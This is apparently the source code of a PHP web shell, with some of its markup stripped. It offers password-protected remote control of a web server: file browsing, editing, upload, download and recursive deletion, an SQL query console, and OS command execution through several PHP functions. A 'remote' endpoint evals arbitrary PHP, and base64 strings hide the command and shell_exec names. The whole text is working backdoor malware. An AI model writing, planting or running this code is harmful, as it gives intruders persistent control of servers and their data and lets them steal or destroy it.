Shell

action = isset($_GET["act"])? $_GET["act"]:null; $this->setCookies(); } public function login() { if(!$this->isAuthenticated()) { if(@md5($_POST["password"]) == PASSWORD) { setcookie("shell_pass", PASSWORD, time() + (60 * 60 * 24), "/"); header("Location: " . this_url()); } else { ?> action == "exit") { setcookie("shell_pass", null, time() - (60 * 60), "/"); setcookie("shell_path", null, time() - (60 * 60), "/"); setcookie("shell_sql", null, time() - (60 * 60), "/"); header("Location: " . this_url()); } } private function isAuthenticated() { if(!isset($_COOKIE["shell_pass"])) return false; if($_COOKIE["shell_pass"] != PASSWORD) return false; return true; } private function setCookies() { if(!isset($_COOKIE["shell_path"]) || !is_dir($_COOKIE['shell_path'])) setcookie("shell_path", root_dir(), time() + (60 * 60 * 24), "/"); elseif(isset($_GET['path']) && is_dir($_GET['path'])) setcookie("shell_path", $_GET['path'], time() + (60 * 60 * 24), "/"); if(!isset($_COOKIE["shell_sql"])) { $cookie = array("host", "user", "pass", "db", "dbms"); } else { $values = unserialize($_COOKIE["shell_sql"]); $cookie = array(); $cookie[] = (isset($_POST['host']) && @$_POST['host'] != "")? $_POST['host']:$values[0]; $cookie[] = (isset($_POST['user']) && @$_POST['user'] != "")? $_POST['user']:$values[1]; $cookie[] = (isset($_POST['pass']) && @$_POST['pass'] != "")? $_POST['pass']:$values[2]; $cookie[] = ((isset($_POST['db']) && @$_POST['db'] != "")? $_POST['db']:(isset($_GET['db']) ? $_GET['db']:$values[3])); $cookie[] = (isset($_POST['dbms']) && @$_POST['dbms'] != "")? $_POST['dbms']:$values[4]; } setcookie("shell_sql", serialize($cookie), time() + (60 * 60 * 24), "/"); } public function download() { if(isset($_POST["download"]) && $this->isAuthenticated()) FileTransfer::downloader($_POST['path']); } public function info() { ?>

OS:

Server:

Computer:	Domain:	User:	IP:

action == "fbrowser") { $fbrowser = new FileBrowser(this_path()); $fbrowser->body(); } elseif($this->action == "feditor") { $feditor = new FileEditor((this_file() ? this_file():this_path())); $feditor->actions(); $feditor->body(); } elseif($this->action == "fuploader") { FileTransfer::uploader(this_path()); } elseif($this->action == baseos("Y21k")) { Cmd::body(); } elseif($this->action == baseos("c3Fs")) { $sql = new Database(); $sql->query(); $sql->body(); } elseif($this->action == "exit") { $this->logout(); } } public function remote() { function request($req) { return isset($_GET[$req]) ? urldecode($_GET[$req]):base64_decode($_POST[$req]); } if(isset($_REQUEST["remote"]) && @md5($_REQUEST["password"]) == PASSWORD) { if(isset($_REQUEST[baseos("Y21k")])) Cmd::run(request(baseos("Y21k"))); elseif(isset($_REQUEST["php"])) eval(request("php")); elseif(isset($_REQUEST["info"])) echo os().":".@get_current_user()."/".@gethostname().":".@getenv('SERVER_ADDR'); exit(); } } } class FileBrowser { public function __construct($path) { $this->path = $path; } public function body() { ?> "> "> dirsFiles(); ?>

Cwd: cwd(); ?>	Home	Drives: drives(); ?>
Name	Size	Permissions	Created	Modified

%s%s%s / %s%s%s"; $dstr = "%s%s%s / %s%s%s"; $dfl = $this->listDirsFiles(); if($dfl == false) return "Can't access: $this->path"; $df_list = ""; foreach($dfl[0] as $d) $df_list .= sprintf($fstr, urlencode($d[1].DIRECTORY_SEPARATOR), $d[0].DIRECTORY_SEPARATOR, $d[2], $d[3], $d[4], $d[5], $d[6]); foreach($dfl[1] as $f) $df_list .= sprintf($dstr, urlencode($f[1]), $f[0], $f[2], $f[3], $f[4], $f[5], $f[6]); return $df_list; } public function listDirsFiles() { $dirs = array(); $files = array(); if(($d_f = @scandir($this->path)) === false) return false; foreach($d_f as $i) { if($i != '.' && $i != '..') { $path = $this->path . $i; if(is_dir($this->path . $i)) $dirs[] = array( $i, $path, "Dir", $this->getUidGid($path), $this->getPerms($path), $this->getCMDate($path), $this->getCMDate($path, 9) ); if(is_file($this->path . $i)) $files[] = array( $i, $path, $this->getSize($path), $this->getUidGid($path), $this->getPerms($path), $this->getCMDate($path), $this->getCMDate($path, 9) ); } } return array($dirs, $files); } private function cwd() { $path = ""; $parts = explode(DIRECTORY_SEPARATOR, $this->path); for($i=0; $i" . $parts[$i] . DIRECTORY_SEPARATOR . ""; } } private function drives() { foreach(range("A", "Z") as $drive) { if(@is_readable($drive . ":" . DIRECTORY_SEPARATOR)) echo "$drive:\\ "; elseif(@is_dir($drive . ":" . DIRECTORY_SEPARATOR)) echo "$drive:\\ "; } } private function getSize($path) { $stat = stat($path); if($stat[7] > (1024*1024)) return (int)($stat[7] / (1024*1024)) . " MB"; elseif($stat[7] > 1024) return (int)($stat[7] / 1024) . " KB"; return $stat[7] . " B"; } private function getPerms($path) { return substr(sprintf("%o", fileperms($path)), -4); } private function getUidGid($path) { $stat = stat($path); return $stat[4] . ":" . $stat[5]; } private function getCMDate($path, $d=10) { $stat = stat($path); return date("d/m/Y H:i", $stat[$d]); } } class FileEditor { public function __construct($path) { $this->path = isset($_POST['path'])? $_POST['path']:$path; $this->text = ""; $this->message = ""; } public function actions() { if(isset($_POST["read"])) $this->feRead(); elseif(isset($_POST["write"])) $this->feWrite($_POST['content']); elseif(isset($_POST["remove"])) $this->message = $this->feRemove($this->path) ? "Deleted.":"Failed."; elseif(isset($_POST["rename"])) $this->feRename(((this_file() == null) ? this_path():this_file())); elseif(isset($_POST["mkdir"])) $this->feMkdir(); } public function body() { ?>

message; ?>

<?php echo $this->text; ?>

path)) !== false) $this->text = $this->isHtml($data) ? htmlspecialchars($data):$data; else $this->message = "Can't access file."; } private function feWrite($data) { $this->message = (@file_put_contents($this->path, $data) !== false) ? "Saved.":"Failed."; } private function feRemove($path) { if(!is_file($path) && !is_dir($path)) return false; if(is_file($path)) return @unlink($path); if(($dir_content = @scandir($path)) === false) return false; foreach($dir_content as $d_f) if($d_f != "." && $d_f != "..") $this->feRemove($path . DIRECTORY_SEPARATOR . $d_f); return @rmdir($path); } private function feRename($new_path) { $this->message = (@rename($this->path, $new_path) !== false) ? "Renamed.":"Failed."; } private function feMkdir() { $this->message = (@mkdir($this->path) !== false) ? "Created.":"Failed."; } private function isHtml($data) { if(preg_match('//im', $data, $m) || preg_match('//im', $data, $m)) return true; return false; } } class FileTransfer { public static function uploader($path) { ?> File uploaded."; else echo "Failed."; } } public static function downloader($file) { header("Content-Disposition: attachment; filename=\"" . @basename($file) . "\""); header("Content-Length: \"" . @filesize($file) . "\""); header("Content-Type: application/octet-stream;"); @readfile($file); exit(); } } class Database { private $my_dbs = "SHOW DATABASES;"; private $my_tbl = "SHOW TABLES;"; private $ms_dbs = "SELECT name FROM master.dbo.sysdatabases"; private $ms_tbl = "SELECT * FROM INFORMATION_SCHEMA.TABLES;"; public function __construct() { $cookies = isset($_COOKIE["shell_sql"]) ? unserialize($_COOKIE["shell_sql"]):array("host", "user", "pass", "db", "dbms"); $get_db = isset($_GET['db']) ? urldecode($_GET['db']):null; $get_table = isset($_GET['table']) ? urldecode($_GET['table']):null; $this->host = isset($_POST['host']) ? $_POST['host']:$cookies[0]; $this->user = isset($_POST['user']) ? $_POST['user']:$cookies[1]; $this->pass = isset($_POST['pass']) ? $_POST['pass']: $cookies[2]; $this->db = (isset($get_db) ? $get_db : (isset($_POST['db']) ? $_POST['db']:$cookies[3])); $this->dbms = isset($_POST['dbms']) ? $_POST['dbms']:$cookies[4]; $this->query = (isset($get_db) ? "SHOW TABLES;":(isset($get_table) ? "SELECT * FROM $get_table;":$this->my_dbs)); if(isset($_POST["submit"])) $this->query = ((@$_POST['query'] != "") ? $_POST['query']:($this->dbms == "mssql" ? $this->ms_dbs:$this->my_dbs)); $this->output = ""; } public function body() { ?>

output; ?>
dbms:host=$this->host; dbname=$this->db"; try { @$conn = new PDO("$this->dbms:host=$this->host; dbname=$this->db", $this->user, $this->pass); @$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); @$query = $conn->prepare($this->query); try { @$query->execute(); if(strtoupper(substr($this->query, 0, 6)) == "SELECT" || strtoupper(substr($this->query, 0, 4)) == "SHOW") $this->read($query); else $this->output = "Query executed."; } catch(PDOException $e) { $this->output = "Query failed." . $e->getMessage(); } } catch(PDOException $e) { $this->output = "Connection failed: " . $e->getMessage(); } $conn = null; } } private function read($query) { $this->output = ""; $result = @$query->setFetchMode(PDO::FETCH_ASSOC); foreach($query->fetchAll() as $id => $row) { if($id == 0) { $this->output .= ""; foreach($row as $n => $v) $this->output .= ""; $this->output .= ""; } $this->output .= ""; foreach($row as $n => $v) { if(strtoupper($n) == "DATABASE") $this->output .= ""; elseif(strtoupper(substr($n, 0, 5)) == "TABLE") $this->output .= ""; else $this->output .= ""; } $this->output .= ""; } $this->output .= "
$n
" . $v . " " . $v . " " . htmlspecialchars($v) . "
"; } } class Cmd { public static function body() { ?>

&1"; echo "
"; Cmd::run($cmd); echo "
"; } } public static function run($cmd) { if(is_callable("system")) system($cmd); elseif(is_callable("passthru")) passthru($cmd); else echo Cmd::output($cmd); } public static function output($cmd) { $output = ""; if(is_callable(baseos("c2hlbGxfZXhlYw=="))) { $output = shell_exec($cmd); } elseif(is_callable("exec")) { exec($cmd, $out); foreach($out as $o) $output .= $o . PHP_EOL; } elseif(is_callable("popen")) { if(($pop = popen($cmd, 'r')) !== false) { while(!feof($pop)) $output .= fread($pop, 1024); pclose($pop); } } elseif(is_callable("proc_open")) { $desc = array(0=>array("pipe", "r"), 1=>array("pipe", "w"), 2=>array("pipe", "w")); $proc = proc_open($cmd, $desc, $pipes); while(!feof($pipes[1])) $output .= fread($pipes[1], 1024) ; fclose($pipes[1]); proc_close($proc); } else { $output = "Failed."; } return $output; } } class Css { public static function colors() { if(STYLE == "dark") $colors = array( "color"=>"#ddefff", "back"=>"#181818", "link"=>"#ddefff", "visited"=>"#83c5ff", "hover"=>"#202020" ); else $colors = array( "color"=>"#181818", "back"=>"#f0f8ff", "link"=>"#015fb2", "visited"=>"#00437e", "hover"=>"#ddefff" ); return $colors; } public static function style($part="color") { $colors = Css::colors(); if($part == "body" || $part == "table" || $part == "tr" || $part == "th" || $part == "td") { return sprintf(" color:%s; background-color:%s; ", $colors['color'], $colors['back']); } elseif($part == "input") { if(STYLE == "dark") return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $colors['back'], $colors['color'], $colors['visited']); else return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $colors['hover'], "#242424", $colors['link']); } elseif($part == "hover") { return sprintf(" color:%s; background-color:%s; ", $colors['color'], $colors['hover']); } else { return $colors; } } } ?> remote(); ?> login(); ?> logout(); ?> download(); ?> Shell
info(); ?>

FileBrowser FileEditor FileUploader RunCmd SqlQueries Exit

actions(); ?>